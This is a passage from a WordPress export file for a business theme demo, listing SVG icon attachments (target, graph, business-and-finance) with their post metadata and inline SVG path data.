		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M54.754,149.62h87.326l-29.633,43.741c-2.323,3.429-1.426,8.092,2.003,10.415c3.43,2.322,8.093,1.427,10.416-2.003   l35.332-52.153h48.731l81.4,120.155c1.45,2.14,3.812,3.294,6.216,3.294c1.448,0,2.911-0.419,4.2-1.292   c3.429-2.323,4.326-6.986,2.003-10.415l-80.751-119.196l48.252-69.697c6.55-9.462,7.301-21.671,1.96-31.864   S256.402,24.08,244.895,24.08H124.232c-11.508,0-21.974,6.332-27.315,16.525s-4.59,22.402,1.96,31.865l31.663,45.734L66.664,80.396   c-3.565-2.109-8.164-0.93-10.274,2.634c-2.11,3.564-0.931,8.165,2.634,10.274l69.801,41.315h-74.07c-4.142,0-7.5,3.357-7.5,7.5   S50.612,149.62,54.754,149.62z M110.204,47.567c2.785-5.314,8.029-8.487,14.028-8.487h120.662c6,0,11.244,3.173,14.028,8.487   c2.785,5.313,2.408,11.432-1.007,16.364l-48.938,70.688h-48.828l-48.938-70.688C107.796,58.999,107.419,52.881,110.204,47.567z"></path>
	<path d="M393.083,250.087c-65.571,0-118.917,53.346-118.917,118.917c0,36.209,16.273,68.685,41.883,90.514   c-13.427,8.683-29.198,13.402-45.309,13.402H98.39c-22.276,0-43.217-8.674-58.967-24.424C23.674,432.747,15,411.806,15,389.53   c0-16.737,4.962-32.908,14.349-46.764l78.52-115.899c2.323-3.43,1.427-8.093-2.002-10.416c-3.429-2.322-8.093-1.427-10.416,2.002   l-78.52,115.899C5.854,350.701,0,369.781,0,389.53c0,26.282,10.234,50.99,28.817,69.573c18.582,18.582,43.291,28.816,69.573,28.816   h172.35c20.862,0,41.245-6.703,58.015-18.945c18.557,11.982,40.644,18.945,64.328,18.945C458.654,487.92,512,434.574,512,369.004   C512,303.433,458.654,250.087,393.083,250.087z M393.083,472.92c-57.3,0-103.917-46.616-103.917-103.916   s46.617-103.917,103.917-103.917S497,311.704,497,369.004S450.383,472.92,393.083,472.92z"></path>
	<path d="M470.074,327.032c-1.986-3.635-6.542-4.972-10.177-2.986c-3.635,1.985-4.973,6.542-2.987,10.178   c5.787,10.595,8.846,22.621,8.846,34.78c0,40.072-32.601,72.673-72.673,72.673s-72.673-32.601-72.673-72.673   s32.601-72.673,72.673-72.673c16.979,0,33.497,5.978,46.512,16.831c3.181,2.653,7.911,2.224,10.563-0.956   c2.653-3.182,2.225-7.911-0.956-10.563c-15.706-13.098-35.636-20.312-56.119-20.312c-48.343,0-87.673,39.33-87.673,87.673   s39.33,87.673,87.673,87.673s87.673-39.33,87.673-87.673C480.756,354.34,477.063,339.826,470.074,327.032z"></path>
	<path d="M393.083,426.906c4.142,0,7.5-3.357,7.5-7.5v-7.827h2.454c13.806,0,25.038-11.232,25.038-25.038   s-11.232-25.037-25.038-25.037h-19.908c-5.535,0-10.038-4.503-10.038-10.038s4.503-10.038,10.038-10.038h29.192   c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-11.738v-7.827c0-4.143-3.358-7.5-7.5-7.5s-7.5,3.357-7.5,7.5v7.827h-2.454   c-13.806,0-25.038,11.232-25.038,25.038s11.232,25.038,25.038,25.038h19.908c5.535,0,10.038,4.503,10.038,10.037   c0,5.535-4.503,10.038-10.038,10.038h-29.192c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h11.739v7.827   C385.583,423.549,388.941,426.906,393.083,426.906z"></path>
	<path d="M332.578,156.935l5.861-4.688v68.76c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-68.76l5.861,4.688   c1.383,1.106,3.037,1.644,4.68,1.644c2.2,0,4.38-0.963,5.861-2.814c2.588-3.235,2.063-7.954-1.171-10.542l-18.046-14.437   c-0.019-0.016-0.042-0.025-0.061-0.041c-0.315-0.248-0.648-0.473-1.001-0.668c-0.007-0.003-0.013-0.008-0.02-0.012   c-0.339-0.186-0.696-0.339-1.064-0.472c-0.05-0.018-0.1-0.038-0.15-0.055c-0.347-0.116-0.704-0.207-1.071-0.272   c-0.065-0.011-0.129-0.02-0.193-0.029c-0.368-0.056-0.741-0.093-1.124-0.093s-0.756,0.038-1.124,0.093   c-0.065,0.01-0.129,0.018-0.193,0.029c-0.367,0.065-0.725,0.156-1.071,0.272c-0.051,0.017-0.1,0.037-0.15,0.055   c-0.368,0.132-0.725,0.286-1.064,0.472c-0.007,0.004-0.013,0.009-0.02,0.012c-0.353,0.195-0.686,0.421-1.001,0.668   c-0.02,0.016-0.042,0.025-0.061,0.041l-18.046,14.437c-3.234,2.588-3.759,7.307-1.171,10.542   C324.624,158.997,329.342,159.522,332.578,156.935z"></path>
	<path d="M426.867,116.712l5.861-4.688v68.76c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-68.76l5.861,4.688   c1.383,1.106,3.037,1.644,4.68,1.644c2.2,0,4.38-0.963,5.861-2.814c2.588-3.235,2.063-7.954-1.171-10.542l-18.046-14.437   c-0.019-0.016-0.042-0.025-0.061-0.041c-0.315-0.248-0.648-0.473-1.001-0.668c-0.007-0.003-0.013-0.008-0.02-0.012   c-0.339-0.186-0.696-0.339-1.064-0.472c-0.05-0.018-0.1-0.038-0.15-0.055c-0.347-0.116-0.704-0.207-1.071-0.272   c-0.065-0.011-0.129-0.02-0.193-0.029c-0.368-0.056-0.741-0.093-1.124-0.093s-0.756,0.038-1.124,0.093   c-0.065,0.01-0.129,0.018-0.193,0.029c-0.367,0.065-0.725,0.156-1.071,0.272c-0.051,0.017-0.1,0.037-0.15,0.055   c-0.368,0.132-0.725,0.286-1.064,0.472c-0.007,0.004-0.013,0.009-0.02,0.012c-0.353,0.195-0.686,0.421-1.001,0.668   c-0.02,0.016-0.042,0.025-0.061,0.041l-18.046,14.437c-3.234,2.588-3.759,7.307-1.171,10.542   C418.913,118.774,423.632,119.299,426.867,116.712z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>target</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/target/</link>
		<pubDate>Mon, 07 Dec 2020 08:51:31 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/target.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1404</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:51:31]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:51:31]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[target]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/target.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/target.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M136.53,207.562c0.446,0.08,0.89,0.118,1.327,0.118c3.564,0,6.726-2.552,7.375-6.183   c6.598-36.951,26.111-70.729,54.946-95.113c29.17-24.667,66.308-38.252,104.571-38.252c40.815,0,79.809,15.224,109.798,42.867   c3.044,2.808,7.791,2.614,10.598-0.432s2.614-7.79-0.432-10.598c-32.767-30.204-75.372-46.838-119.964-46.838   c-41.804,0-82.381,14.844-114.257,41.798c-31.498,26.635-52.816,63.545-60.027,103.93   C129.737,202.938,132.452,206.834,136.53,207.562z"></path>
	<path d="M395.017,329.524c1.897,0,3.797-0.716,5.257-2.151c26.279-25.831,40.752-60.348,40.752-97.193   c0-75.144-61.134-136.278-136.278-136.278c-30.819,0-61.021,10.578-85.044,29.787c-23.652,18.912-40.526,45.458-47.516,74.75   c-0.961,4.029,1.526,8.075,5.555,9.036c4.032,0.962,8.075-1.525,9.036-5.555c6.218-26.059,21.238-49.681,42.293-66.517   c21.683-17.338,47.852-26.502,75.676-26.502c66.873,0,121.278,54.405,121.278,121.278c0,32.789-12.88,63.507-36.267,86.496   c-2.954,2.903-2.995,7.652-0.091,10.606C391.137,328.775,393.076,329.524,395.017,329.524z"></path>
	<path d="M367.008,334.279c-18.747,11.238-40.276,17.178-62.26,17.178c-33.428,0-64.563-13.311-87.672-37.481   c-2.862-2.994-7.609-3.101-10.604-0.238c-2.994,2.862-3.101,7.61-0.238,10.604c25.965,27.158,60.952,42.115,98.514,42.115   c24.7,0,48.896-6.678,69.972-19.313c3.553-2.129,4.707-6.736,2.577-10.289C375.168,333.303,370.561,332.148,367.008,334.279z"></path>
	<path d="M304.748,139.704c-18.697,0-36.643,5.656-51.899,16.357c-14.907,10.456-26.202,24.94-32.665,41.888   c-1.476,3.87,0.465,8.204,4.335,9.68c3.87,1.478,8.205-0.465,9.68-4.335c11.083-29.063,39.434-48.59,70.548-48.59   c41.617,0,75.476,33.858,75.476,75.475s-33.858,75.476-75.476,75.476c-15.522,0-30.43-4.673-43.111-13.515   c-12.404-8.648-21.838-20.637-27.283-34.672c-1.498-3.861-5.843-5.777-9.705-4.279c-3.861,1.498-5.777,5.843-4.279,9.705   c6.527,16.823,17.83,31.191,32.688,41.55c15.21,10.605,33.084,16.211,51.69,16.211c49.888,0,90.476-40.587,90.476-90.476   S354.637,139.704,304.748,139.704z"></path>
	<path d="M120.319,294.523c-3.664-1.934-8.201-0.528-10.132,3.136c-10.091,19.14-23.911,45.353-5.271,71.411   c1.427,1.995,3.713,3.137,6.1,3.137c0.549,0,1.104-0.061,1.655-0.186c2.943-0.666,5.201-3.031,5.729-6.002   c1.514-8.514,8.798-18.489,22.206-30.367c9.176,13.464,21.644,24.868,38.622,35.423c3.039,1.889,6.986,1.369,9.432-1.241   c2.446-2.609,2.709-6.583,0.628-9.492c-13.336-18.643-3.311-37.522,8.297-59.383c10.34-19.473,21.84-41.151,13.625-63.282h51.721   c3.553,19.865,20.946,34.995,41.817,34.995c23.431,0,42.494-19.063,42.494-42.494s-19.063-42.494-42.494-42.494   c-20.87,0-38.262,15.128-41.817,34.992H113.867L79.721,197.25c-1.294-0.964-2.865-1.485-4.479-1.485H7.5   c-3.057,0-5.809,1.856-6.954,4.69c-1.145,2.835-0.455,6.081,1.744,8.205c5.898,5.696,9.147,13.338,9.147,21.52   c0,8.182-3.249,15.824-9.146,21.519c-2.2,2.124-2.89,5.37-1.745,8.205c1.146,2.835,3.896,4.691,6.954,4.691h67.741   c1.614,0,3.185-0.521,4.479-1.485l34.151-25.431h8.604c5.668,9.724,5.769,20.11,0.451,33.965c-1.484,3.867,0.447,8.206,4.314,9.69   c3.865,1.483,8.205-0.448,9.689-4.314c3.859-10.053,7.708-24.167,2.098-39.34h55.631c10.182,17.631,0.635,35.61-10.322,56.246   c-8.297,15.625-17.349,32.67-16.356,50.23c-7.978-7.166-14.203-14.884-19.047-23.522c-1.084-1.932-2.966-3.286-5.143-3.7   c-2.177-0.41-4.424,0.158-6.141,1.558c-12.267,10.01-20.948,18.887-26.546,27.296c-1.776-12.667,4.358-25.971,12.352-41.133   C125.388,300.991,123.983,296.455,120.319,294.523z M304.748,202.686c15.16,0,27.494,12.333,27.494,27.494   s-12.333,27.494-27.494,27.494c-12.56,0-23.172-8.469-26.445-19.995h26.447c4.142,0,7.5-3.358,7.5-7.5s-3.358-7.5-7.5-7.5h-26.446   C281.578,211.154,292.189,202.686,304.748,202.686z M72.755,249.594H22.053c2.871-5.976,4.384-12.568,4.384-19.415   c0-6.846-1.513-13.439-4.384-19.415h50.702l26.071,19.415L72.755,249.594z"></path>
	<path d="M504.5,443.863h-53.2l-41.456-71.217c45.173-33.355,71.947-86.089,71.947-142.469c0-38.807-12.322-75.65-35.633-106.547   c-2.494-3.306-7.197-3.964-10.504-1.47c-3.307,2.495-3.965,7.198-1.47,10.504c21.332,28.273,32.607,61.993,32.607,97.513   c0,53.746-26.574,103.887-71.089,134.129c-10.63,7.233-22.116,13.165-34.149,17.671c-0.38,0.142-0.756,0.297-1.138,0.436   c0,0-0.001,0-0.001,0c-0.001,0-0.001,0-0.002,0.001c-17.781,6.511-36.508,9.813-55.661,9.813c-19.126,0-37.855-3.302-55.664-9.813   c-12.421-4.543-24.298-10.64-35.328-18.138c-2.229-1.501-4.558-3.174-7.117-5.114c-3.301-2.504-8.004-1.856-10.507,1.444   s-1.856,8.005,1.444,10.508c0.7,0.531,1.385,1.044,2.058,1.541l-41.446,71.208h-53.194c-4.142,0-7.5,3.358-7.5,7.5   s3.358,7.5,7.5,7.5h57.43c0.025,0,0.049,0.005,0.073,0.005h54.31c0.023,0,0.045-0.005,0.068-0.005h175.733   c0.023,0,0.045,0.005,0.068,0.005h54.31c0.025,0,0.049-0.005,0.073-0.005H504.5c4.142,0,7.5-3.358,7.5-7.5   S508.642,443.863,504.5,443.863z M397.399,443.863l-24.158-50.375c0.631-0.265,1.257-0.541,1.885-0.813   c0.259-0.112,0.519-0.222,0.777-0.335c1.445-0.635,2.881-1.292,4.309-1.965c0.3-0.141,0.598-0.285,0.897-0.429   c1.42-0.68,2.833-1.373,4.235-2.091c0.049-0.025,0.098-0.049,0.147-0.074c1.435-0.737,2.856-1.499,4.271-2.275   c0.302-0.165,0.603-0.331,0.904-0.498c1.384-0.77,2.759-1.555,4.121-2.361c0.206-0.122,0.411-0.248,0.617-0.371   c0.665-0.398,1.331-0.793,1.991-1.2l36.55,62.787H397.399z M359.112,398.716l21.651,45.147H228.729l21.659-45.15   c17.515,5.648,35.768,8.515,54.362,8.515C323.367,407.228,341.62,404.361,359.112,398.716z M212.108,381.047   c7.734,4.76,15.815,8.915,24.16,12.421l-24.175,50.395h-36.546L212.108,381.047z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>graph</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/graph/</link>
		<pubDate>Mon, 07 Dec 2020 08:52:35 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/graph.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1405</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:52:35]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:52:35]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[graph]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/graph.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/graph.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M326.623,133.062c13.785,0,25-11.215,25-25s-11.215-25.001-25-25.001s-25,11.216-25,25.001   c0,5.63,1.872,10.83,5.025,15.014l-41.076,57.401c-2.451-0.805-5.066-1.247-7.784-1.247c-6.569,0-12.551,2.551-17.017,6.709   l-27.379-15.536c0.365-1.696,0.561-3.454,0.561-5.257c0-13.785-11.215-25-25-25s-25,11.215-25,25c0,1.803,0.196,3.561,0.561,5.257   l-27.379,15.536c-4.466-4.158-10.448-6.708-17.017-6.708c-13.785,0-25,11.216-25,25.001s11.215,25.001,25,25.001   s25-11.216,25-25.001c0-1.803-0.196-3.561-0.561-5.257l27.379-15.536c4.466,4.158,10.448,6.709,17.017,6.709   c6.569,0,12.55-2.551,17.017-6.708l27.379,15.536c-0.365,1.696-0.561,3.454-0.561,5.257c0,13.785,11.215,25.001,25,25.001   c13.786,0,25.001-11.216,25.001-25.001c0-5.631-1.873-10.832-5.026-15.016l41.076-57.401   C321.289,132.62,323.905,133.062,326.623,133.062z M326.623,98.061c5.514,0,10,4.486,10,10.001c0,5.514-4.486,10-10,10   s-10-4.486-10-10C316.622,102.547,321.108,98.061,326.623,98.061z M120.115,214.231c-5.514,0-10-4.486-10-10.001   s4.486-10.001,10-10.001s10,4.486,10,10.001S125.629,214.231,120.115,214.231z M188.951,175.146c-5.514,0-10-4.486-10-10.001   c0-5.514,4.486-10,10-10s10,4.486,10,10C198.952,170.66,194.465,175.146,188.951,175.146z M257.787,214.231   c-5.514,0-10-4.486-10-10.001s4.486-10.001,10-10.001c5.515,0,10.001,4.486,10.001,10.001S263.301,214.231,257.787,214.231z"></path>
	<path d="M418.796,376.965H366.31H80.428H21.215c-3.427,0-6.215-2.788-6.215-6.215V61.331c0-3.427,2.788-6.215,6.215-6.215h35.356   c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5H21.215C9.517,40.116,0,49.633,0,61.331V370.75c0,11.698,9.517,21.215,21.215,21.215   h51.713v16.506c0,9.403,7.65,17.053,17.053,17.053h75.074l-35.34,68.998c-1.888,3.687-0.431,8.206,3.256,10.095   c1.094,0.561,2.262,0.826,3.413,0.826c2.725,0,5.354-1.49,6.681-4.083l38.843-75.836h82.922l38.843,75.836   c1.328,2.593,3.956,4.083,6.681,4.083c1.151,0,2.319-0.267,3.413-0.826c3.687-1.889,5.145-6.408,3.256-10.095l-35.34-68.998h75.074   c9.403,0,17.053-7.649,17.053-17.053v-16.506h44.986c4.142,0,7.5-3.357,7.5-7.5S422.938,376.965,418.796,376.965z M358.81,408.471   c0,1.132-0.921,2.053-2.053,2.053H89.981c-1.132,0-2.053-0.921-2.053-2.053v-16.506H358.81V408.471z"></path>
	<path d="M86.571,55.116h102.672h68.251h168.028c3.427,0,6.215,2.788,6.215,6.215v71.311c0,4.143,3.358,7.5,7.5,7.5   s7.5-3.357,7.5-7.5V61.331c0-11.698-9.517-21.215-21.215-21.215H264.995V25.374c0-10.375-8.441-18.816-18.817-18.816H200.56   c-10.375,0-18.817,8.441-18.817,18.816v14.742H86.571c-4.142,0-7.5,3.357-7.5,7.5S82.429,55.116,86.571,55.116z M196.743,25.374   c0-2.104,1.712-3.816,3.817-3.816h45.618c2.104,0,3.817,1.712,3.817,3.816v14.742h-53.251V25.374z"></path>
	<path d="M104.902,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H104.902z M127.829,333.849h-15.427v-51.272h15.427V333.849z"></path>
	<path d="M173.737,229.248c-4.142,0-7.5,3.357-7.5,7.5v104.601c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5V236.748   c0-4.143-3.358-7.5-7.5-7.5H173.737z M196.665,333.849h-15.427v-89.601h15.427V333.849z"></path>
	<path d="M242.573,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5H273c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H242.573z M265.5,333.849h-15.427v-51.272H265.5V333.849z"></path>
	<path d="M311.409,311.832c-4.142,0-7.5,3.357-7.5,7.5v22.017c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5   s-3.358-7.5-7.5-7.5h-22.927v-14.517C318.909,315.189,315.551,311.832,311.409,311.832z"></path>
	<path d="M508.175,384.019l-43.027-74.526c10.901-11.619,18.839-25.816,23.079-41.64c6.777-25.291,3.299-51.708-9.793-74.384   c-27.026-46.813-87.097-62.906-133.907-35.881c-46.811,27.025-62.906,87.096-35.88,133.907   c13.092,22.676,34.231,38.896,59.522,45.674c8.446,2.263,17.015,3.382,25.53,3.382c7.442,0,14.841-0.856,22.077-2.55l43.018,74.528   c5.273,9.137,14.875,14.25,24.737,14.249c4.833,0,9.729-1.229,14.208-3.813c8.796-5.077,14.261-14.544,14.261-24.706   C512,393.28,510.678,388.357,508.175,384.019z M372.051,322.68c-21.421-5.74-39.326-19.479-50.415-38.685   c-22.89-39.648-9.257-90.526,30.39-113.417c13.043-7.53,27.296-11.106,41.374-11.106c28.715,0,56.683,14.893,72.043,41.497   c11.088,19.206,14.034,41.58,8.294,63.002c-5.74,21.422-19.479,39.325-38.685,50.414   C415.847,325.474,393.473,328.418,372.051,322.68z M490.242,409.973c-6.453,3.726-14.733,1.508-18.456-4.942l-41.388-71.704   c4.148-1.693,8.21-3.673,12.156-5.951c3.949-2.28,7.689-4.818,11.23-7.566l41.4,71.707c1.188,2.061,1.816,4.393,1.816,6.743   C497,403.078,494.41,407.567,490.242,409.973z"></path>
	<path d="M461.542,263.611c5.295-17.056,4.034-35.316-3.551-51.416c-1.766-3.748-6.234-5.354-9.981-3.589   c-3.748,1.766-5.354,6.234-3.588,9.981c5.983,12.7,6.976,27.109,2.795,40.575c-4.204,13.54-13.286,24.903-25.573,31.997   c-13.002,7.508-28.151,9.5-42.652,5.615c-14.502-3.886-26.624-13.187-34.13-26.189c-15.497-26.841-6.267-61.285,20.574-76.782   c19.625-11.329,43.98-9.815,62.051,3.857c3.304,2.5,8.007,1.849,10.506-1.455c2.499-3.303,1.848-8.007-1.456-10.506   c-22.891-17.321-53.745-19.238-78.602-4.887c-16.472,9.51-28.255,24.866-33.178,43.238s-2.396,37.562,7.114,54.034   c9.51,16.473,24.866,28.255,43.238,33.179c6.135,1.644,12.361,2.457,18.546,2.457c12.338,0,24.517-3.236,35.488-9.571   C444.71,295.163,456.216,280.767,461.542,263.611z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>business-and-finance</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/business-and-finance/</link>
		<pubDate>Mon, 07 Dec 2020 08:53:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/business-and-finance.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1407</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:53:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:53:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-and-finance]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/business-and-finance.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/business-and-finance.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 